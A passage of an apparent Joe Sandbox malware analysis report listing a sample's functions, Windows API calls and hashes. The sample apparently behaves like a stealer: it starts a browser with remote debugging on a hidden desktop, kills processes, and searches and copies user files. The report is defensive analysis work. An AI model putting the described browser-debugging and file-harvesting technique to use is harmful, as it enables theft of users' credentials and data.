                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: 79ca529e4046b7185f239fbf2c5ae2d32d19a528eafcb29e5c62ad53cea9bb75
                                  • Instruction ID: 731493f861e5dabd38fcc3cb0b91f0a35fa55425c35f941fcd142f8e7b66519f
                                  • Opcode Fuzzy Hash: 79ca529e4046b7185f239fbf2c5ae2d32d19a528eafcb29e5c62ad53cea9bb75
                                  • Instruction Fuzzy Hash: E9C16271A102199FDB29DF64DC89AEE7779BF58300F044598F509A7290DF30AE99CFA0
                                  Function 00309770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00309790
                                  • lstrcat.KERNEL32(?,?), ref: 003097A0
                                  • lstrcat.KERNEL32(?,?), ref: 003097B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003097C3
                                  • memset.MSVCRT ref: 003097D7
                                    • Part of subcall function 00323E70: lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00323EA5
                                    • Part of subcall function 00323E70: lstrcpy.KERNEL32(00000000,01029B48), ref: 00323ECF
                                    • Part of subcall function 00323E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0030134E,?,0000001A), ref: 00323ED9
                                  • wsprintfA.USER32 ref: 00309806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00309827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00309844
                                    • Part of subcall function 003246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003246B9
                                    • Part of subcall function 003246A0: Process32First.KERNEL32(00000000,00000128), ref: 003246C9
                                    • Part of subcall function 003246A0: Process32Next.KERNEL32(00000000,00000128), ref: 003246DB
                                    • Part of subcall function 003246A0: StrCmpCA.SHLWAPI(?,?), ref: 003246ED
                                    • Part of subcall function 003246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00324702
                                    • Part of subcall function 003246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00324711
                                    • Part of subcall function 003246A0: CloseHandle.KERNEL32(00000000), ref: 00324718
                                    • Part of subcall function 003246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00324726
                                    • Part of subcall function 003246A0: CloseHandle.KERNEL32(00000000), ref: 00324731
                                  • memset.MSVCRT ref: 00309862
                                  • lstrcat.KERNEL32(00000000,?), ref: 00309878
                                  • lstrcat.KERNEL32(00000000,?), ref: 00309889
                                  • lstrcat.KERNEL32(00000000,00334B60), ref: 0030989B
                                  • memset.MSVCRT ref: 003098AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003098D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00309903
                                  • StrStrA.SHLWAPI(00000000,0102E048), ref: 00309919
                                  • lstrcpyn.KERNEL32(005393D0,00000000,00000000), ref: 00309938
                                  • lstrlen.KERNEL32(?), ref: 0030994B
                                  • wsprintfA.USER32 ref: 0030995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00309971
                                  • memset.MSVCRT ref: 00309986
                                  • Sleep.KERNEL32(00001388), ref: 003099E7
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 003092E1
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 003092FA
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 00309399
                                    • Part of subcall function 003092B0: strlen.MSVCRT ref: 003093E6
                                    • Part of subcall function 00324740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00324759
                                    • Part of subcall function 00324740: Process32First.KERNEL32(00000000,00000128), ref: 00324769
                                    • Part of subcall function 00324740: Process32Next.KERNEL32(00000000,00000128), ref: 0032477B
                                    • Part of subcall function 00324740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0032479C
                                    • Part of subcall function 00324740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003247AB
                                    • Part of subcall function 00324740: CloseHandle.KERNEL32(00000000), ref: 003247B2
                                    • Part of subcall function 00324740: Process32Next.KERNEL32(00000000,00000128), ref: 003247C0
                                    • Part of subcall function 00324740: CloseHandle.KERNEL32(00000000), ref: 003247CB
                                  • CloseDesktop.USER32(?), ref: 00309A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 2040986984-1862457068
                                  • Opcode ID: c98b71cb11d964b624acf55c826e793ccf4156cfdf22087b7d4b7d6828d02569
                                  • Instruction ID: bce8932ab8ffe3971fa82effc9d9b5b92d728034e6a0a12c2f76451730efc85e
                                  • Opcode Fuzzy Hash: c98b71cb11d964b624acf55c826e793ccf4156cfdf22087b7d4b7d6828d02569
                                  • Instruction Fuzzy Hash: 699177B1A10218AFDB15DF74DC89FEE77B8AF54700F104555F609AB291DF70AA48CB90
                                  Function 00311269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00311291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003112BF
                                  • lstrlen.KERNEL32(00334CA8), ref: 003112CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003112E7
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 003112F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0031133A
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031135C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00311376
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003113AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003113D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003113E2
                                  • lstrlen.KERNEL32(00331794), ref: 003113ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031140A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311416
                                  • lstrlen.KERNEL32(?), ref: 00311423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00311451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031147A
                                  • StrCmpCA.SHLWAPI(?,0102CAB0), ref: 003114A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003114E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311535
                                  • StrCmpCA.SHLWAPI(?,0102D328), ref: 00311552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003115BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003115E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003117BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003117F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031181C
                                  • FindClose.KERNEL32(00000000), ref: 0031182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 052c87f4d59c325a38f265cb7d503dca63e9a1e0db4ab814f87faeddc5a6f89f
                                  • Instruction ID: 08270e82f904e59df4514ce905fb8697c2b83c807a30f90c06f00274383672a4
                                  • Opcode Fuzzy Hash: 052c87f4d59c325a38f265cb7d503dca63e9a1e0db4ab814f87faeddc5a6f89f
                                  • Instruction Fuzzy Hash: 78C18E71A116069BCB26EF78DC99AEF77B8AF18300F054428F946A7291DF34DC59CB90
                                  Function 0031E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0031E22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031E243
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031E263
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031E27D
                                  • wsprintfA.USER32 ref: 0031E2A2
                                  • StrCmpCA.SHLWAPI(?,0032CFEC), ref: 0031E2B4
                                  • wsprintfA.USER32 ref: 0031E2D1
                                    • Part of subcall function 0031EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0031EE12
                                  • wsprintfA.USER32 ref: 0031E2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0031E304
                                  • lstrcat.KERNEL32(?,0102E2A8), ref: 0031E335
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031E347
                                  • lstrcat.KERNEL32(?,?), ref: 0031E358
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031E36A
                                  • lstrcat.KERNEL32(?,?), ref: 0031E37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0031E394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E422
                                  • DeleteFileA.KERNEL32(?), ref: 0031E45C
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031E49B
                                  • FindClose.KERNEL32(00000000), ref: 0031E4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 055a91f5e48018cd0f2943d28014ee96ccbc8b1d4928f262a726492328f8ecb8
                                  • Instruction ID: fe740b6152c7cb8f7be409cc7c553623af4ba3549d2ae819aa2da49bd6d99f2f
                                  • Opcode Fuzzy Hash: 055a91f5e48018cd0f2943d28014ee96ccbc8b1d4928f262a726492328f8ecb8
                                  • Instruction Fuzzy Hash: 428194719002199BCB25EF64DC89AEF77B8BF58300F044998F91A97290DF75AA58CF90
                                  Function 003016B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003016E2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030176C
                                  • lstrcat.KERNEL32(00000000), ref: 00301776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003017A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003018F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003018FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: 953eff04d362e3f72afaed13c2e2904f5c745dc4a21140249c69d325feaac19e
                                  • Instruction ID: dbb7e83f6806dbb671df64f394f1924b34a520f4f653763f14b81a2ea0b7bc13
                                  • Opcode Fuzzy Hash: 953eff04d362e3f72afaed13c2e2904f5c745dc4a21140249c69d325feaac19e
                                  • Instruction Fuzzy Hash: E4816571A122169BCB23EFA8D9A9AAF77B4AF14700F050114F805AB2D1DF30DD15DBD1
                                  Function 0031DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0031DD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0031DD4C
                                  • wsprintfA.USER32 ref: 0031DD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031DD79
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031DD9C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031DDB6
                                  • wsprintfA.USER32 ref: 0031DDD4
                                  • DeleteFileA.KERNEL32(?), ref: 0031DE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0031DDED
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301557
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 00301579
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 0030159B
                                    • Part of subcall function 00301530: lstrcpy.KERNEL32(00000000,?), ref: 003015FF
                                    • Part of subcall function 0031D980: memset.MSVCRT ref: 0031D9A1
                                    • Part of subcall function 0031D980: memset.MSVCRT ref: 0031D9B3
                                    • Part of subcall function 0031D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031D9DB
                                    • Part of subcall function 0031D980: lstrcpy.KERNEL32(00000000,?), ref: 0031DA0E
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,00000000), ref: 0031DA1C
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,0102DF10), ref: 0031DA36
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,?), ref: 0031DA4A
                                    • Part of subcall function 0031D980: lstrcat.KERNEL32(?,0102CB10), ref: 0031DA5E
                                    • Part of subcall function 0031D980: lstrcpy.KERNEL32(00000000,?), ref: 0031DA8E
                                    • Part of subcall function 0031D980: GetFileAttributesA.KERNEL32(00000000), ref: 0031DA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031DE2E
                                  • FindClose.KERNEL32(00000000), ref: 0031DE3D
                                  • lstrcat.KERNEL32(?,0102E2A8), ref: 0031DE66
                                  • lstrcat.KERNEL32(?,0102D248), ref: 0031DE7A
                                  • lstrlen.KERNEL32(?), ref: 0031DE84
                                  • lstrlen.KERNEL32(?), ref: 0031DE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031DED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: aea79d458c7e8c5f39da6f7a6c10f53a95addd719deb862117ea8f178f5b612b
                                  • Instruction ID: 308808a5e271dd3da9eb0de73d435ec988fb571f8fda04adf97b571b1e0bde81
                                  • Opcode Fuzzy Hash: aea79d458c7e8c5f39da6f7a6c10f53a95addd719deb862117ea8f178f5b612b
                                  • Instruction Fuzzy Hash: B9615F71A10208ABCB25EF74DC89AEE77B9BF58300F0445A8F50697391DF34AA58DF90
                                  Function 0031D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0031D54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0031D564
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031D584
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0031D59E
                                  • lstrcat.KERNEL32(?,0102E2A8), ref: 0031D5E3
                                  • lstrcat.KERNEL32(?,0102E348), ref: 0031D5F7
                                  • lstrcat.KERNEL32(?,?), ref: 0031D60B
                                  • lstrcat.KERNEL32(?,?), ref: 0031D61C
                                  • lstrcat.KERNEL32(?,00331794), ref: 0031D62E
                                  • lstrcat.KERNEL32(?,?), ref: 0031D642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031D682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031D6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0031D737
                                  • FindClose.KERNEL32(00000000), ref: 0031D746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
